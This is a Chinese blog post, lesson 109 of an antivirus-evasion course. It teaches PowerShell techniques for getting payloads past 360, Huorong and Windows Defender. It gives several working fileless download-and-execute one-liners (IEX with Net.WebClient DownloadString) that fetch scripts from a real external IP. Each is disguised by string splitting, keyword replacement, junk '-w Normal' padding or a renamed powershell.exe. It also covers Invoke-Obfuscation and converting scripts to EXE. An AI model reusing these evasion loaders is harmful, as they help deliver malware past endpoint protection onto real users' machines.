首页 > 系统相关 >第109天:免杀对抗-PowerShell&混淆&分离加载&特征修改&EXE生成&填充替换

第109天:免杀对抗-PowerShell&混淆&分离加载&特征修改&EXE生成&填充替换

时间:2024-10-12 21:59:36浏览次数:9  
标签:EXE 免杀 Normal 47.94 System 236.117 109 ps1 PowerShell

知识点

知识点:

1、Powershell-对变量数据做文章
2、Powershell-对Shellcode做文章
3、Powershell-对执行代码特征做文章

章节点:

编译代码面-ShellCode-混淆
编译代码面-编辑执行器-编写
编译代码面-分离加载器-编写
程序文件面-特征码定位-修改
程序文件面-加壳花指令-资源
代码加载面-Dll反射劫持-加载
权限逻辑面-杀毒进程干扰-结束
工具数据面-通讯内存流量-动态

对抗目标:
X60 Defender 某绒 管家 VT等

编程语言:
C/C++ Python C# Go Powershell Ruby Java ASM等

涉及技术:
ShellCode混淆加密,无文件落地,分离拆分,白名单,DLL加载,Syscall,加壳加花,
资源修改,特征修改,二次开发CS,内存休眠,进程注入,反沙盒,反调试,CDN解析等

演示案例

1、PowerShell-文件模式-混淆过某绒

2、PowerShell-文件模式-分离过某60

3、PowerShell-文件模式-特征修改过DF

4、PowerShell-EXE模式-Ladon&Win-PS2

5、PowerShell-命令模式-加载&替换&填充等

#PowerShell-文件模式-混淆过某绒

1、手工混淆:变量进行编码后解码
$bb=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($x))
powershell -ExecutionPolicy bypass -File hr.ps1

2、项目混淆:Invoke-Obfuscation
https://github.com/danielbohannon/Invoke-Obfuscation
加载模块:Import-Module ./Invoke-Obfuscation.psd1
运行程序:Invoke-Obfuscation
处理文件:set scriptpath C:\Users\86135\Desktop\1.ps1
处理代码:set scriptblock 'xxxx'
进入编码:encoding
选择编码:1-8
输出文件:out C:\Users\86135\Desktop\11.ps1

#PowerShell-文件模式-分离过某60

混淆无文件:
无文件:
$d= ((New-Object System.Net.Webclient).DownloadString('http://47.94.236.117/1.txt'))
解码:
$x=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($d))

http://47.94.236.117/1.txt = $d base64数据
$d= ((New-Object System.Net.Webclient).DownloadString('http://47.94.236.117/1.txt'))
$x=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($d))

#PowerShell-文件模式-特征修改过DF

Fuzz DF查杀特征
1、Shellcode换格式
2、变量名&函数名全修改

#PowerShell-EXE模式-Ladon&Win-PS2

GUI-X工具箱内置Ladon
https://github.com/MScholtes/Win-PS2EXE

#PowerShell-命令模式-加载&替换&填充等

1、原型:
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://47.94.236.117/x.ps1'))"

2、替换文件名:
powershell "$a='IEX((New-Object Net.WebClient).DownloadString(''ht';$b='tp://47.94.236.117/x.ps1''));';IEX ($a+$b)"
copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe bypass.txt
bypass.txt "$a='IEX((New-Object Net.WebClient).DownloadString(''ht';$b='tp://47.94.236.117/x.ps1''));';IEX ($a+$b)"

3、垃圾数据干扰:
powershell -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal set-alias -name key -value IEX; key(New-Object Net.WebClient).DownloadString('ht'+'tp://47.94.236.117/x.ps1')

4、替换关键字:
powershell -NoExit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://47.94.236.117/x.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"

5、Ladon混淆命令

标签:EXE,免杀,Normal,47.94,System,236.117,109,ps1,PowerShell
From: https://www.cnblogs.com/dummy6acker/p/18461579

相关文章

  • 第110天:免杀对抗-GO&C#&反VT沙盒&逆向调试&参数加载&资源分离&混淆加密
    知识点#知识点:1、C#-混淆&分离&反调试2、GO-混淆&分离&反调试3、成品程序-包含反调试VT#章节点:编译代码面-ShellCode-混淆编译代码面-编辑执行器-编写编译代码面-分离加载器-编写程序文件面-特征码定位-修改程序文件面-加壳花指令-资源代码加载面-Dll反射劫持-加载权......
  • 第108天:免杀对抗-Python&混淆算法&反序列化&打包生成器&Py2exe&Nuitka
    知识点#知识点:1、Python-对执行代码做文章2、Python-对shellcode做文章3、Python-对代码打包器做文章#章节点:编译代码面-ShellCode-混淆编译代码面-编辑执行器-编写编译代码面-分离加载器-编写程序文件面-特征码定位-修改程序文件面-加壳花指令-资源代码加载面-Dll反......
  • 107-免杀对抗-C&C++&溯源ShellCode上线&混淆变异算法&回调编译执行
    知识点#知识点:1、ShellCode-分析&朔源&感知2、ShellCode-混淆&编码&算法3、回调执行解析-API&汇编&句柄#章节点:编译代码面-ShellCode-混淆编译代码面-编辑执行器-编写编译代码面-分离加载器-编写程序文件面-特征码定位-修改程序文件面-加壳花指令-资源代码加载面-Dll......
  • 植物大战僵尸杂交版 最新官方版(作者:b站潜艇伟伟迷) 植物大战僵尸杂交版v2.4安装程序.ex
    植物大战僵尸杂交版官方版(作者:b站潜艇伟伟迷)植物大战僵尸杂交版v2.4安装程序.exe阿里云盘链接:【旧版2.1】https://www.alipan.com/s/HgmmLFjHzj7提取码:15yc【点击链接保存,或者复制本段内容,打开「阿里云盘」APP,无需下载极速在线查看,视频原画倍速播放。】【最新版2.4】......
  • 最新Qt6将可执行文件打包为独立exe保姆级教学!含报错:无法定位程序输入点于动态链接库解
     相信大家都有类似的体验,自己已经在Qt练习中写出了不错的小程序,每次想发给别人体验都要发一整个大代码包,还得对面有对应的装好的QT才能运行,或者是想把自己的成果记录下来作为一个单独的exe文件却没有办法,今天教大家Qt如何生成独立可执行exe。注意:以下是Qt6之前版本可用的全过......
  • C# WinForms 中嵌入 EXE 程序 打开外部的exe程序
    publicclassProcessEmbedder{//常量定义privateconstintGWL_STYLE=-16;//窗口样式privateconstintWS_VISIBLE=0x10000000;//可见窗口样式//导入user32.dll中的SetParent函数,用于设置窗口的父窗口[DllImport("user32.dll",......
  • 运行使用Electron-forge打包的electron package时遇到在js文件中执行的exec命令和在渲
    js文件中执行的exec命令出错很可能是项目中使用了一些非html,css,js的源文件,比如用了Makefile来编译了cpp代码,或者执行的exec命令为cpdir/something.cpp之类的文件操作命令。可以使用修改forge.config.js文件配置的方式,使得npmrunmake的时候自动把Makefile等exec命令中用到......
  • Jvisualvm介绍;使用Jvisualvm:运行jvisualvm.exe;安装gc插件;查看gc
    一,Jvisualvm介绍jvisualvm是用来查看硬件使用情况的工具,多数会用它来看内存的使用情况VisualVM是Netbeans的profile子项目,已在JDK6.0update7中自带(java启动时不需要特定参数,监控工具在bin/jvisualvm.exe),能够监控线程,内存情况,查看方法的CPU时间和内存中的对象,已被GC的对......
  • python 打包 py 文件 为exe
    使用pyinstaller来进行打包pipinstallpyinstaller可能需要全局科学代理上网或者修改下载源地址执行命令图标path:C:\desktop\icon文件path:C:\pycharm\project\bingdundun.exe1、指定文件路径打包:pyinstaller-FC:\pycharm\project\bingdundun.exe2、不带窗......
  • MES(Manufacturing Execution System,制造执行系统)核心模块
    MES(ManufacturingExecutionSystem,制造执行系统)是现代制造业中不可或缺的一部分,它位于企业的计划层(如ERP)和车间的控制层(如SCADA)之间,起到承上启下的作用。MES系统通常包括多个功能模块,以支持从订单下达到产品完成的整个生产过程的管理和优化。以下是MES系统的一些核心模块:......